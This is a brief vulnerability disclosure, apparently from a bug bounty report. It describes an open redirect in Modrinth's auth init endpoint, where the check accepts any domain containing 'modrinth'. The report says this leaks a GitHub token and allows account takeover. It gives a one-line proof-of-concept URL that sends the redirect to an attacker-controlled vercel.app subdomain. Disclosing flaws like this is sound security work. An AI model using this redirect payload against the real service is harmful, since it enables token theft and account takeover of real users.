# Description
A malicious actor can setup a website on vercel.app with the vercel.app domain, after that, they can change the subdomain to something containing “modrinth“, This will allow a open redirect on “https://api.modrinth.com/v2/auth/init?url=ATTACKER_URL“, allowing stealing the github token which allows full account takeover.

# Proof of Concept
“`
https://api.modrinth.com/v2/auth/init?url=https://test-modrinth.vercel.app/api/hello
“`Read More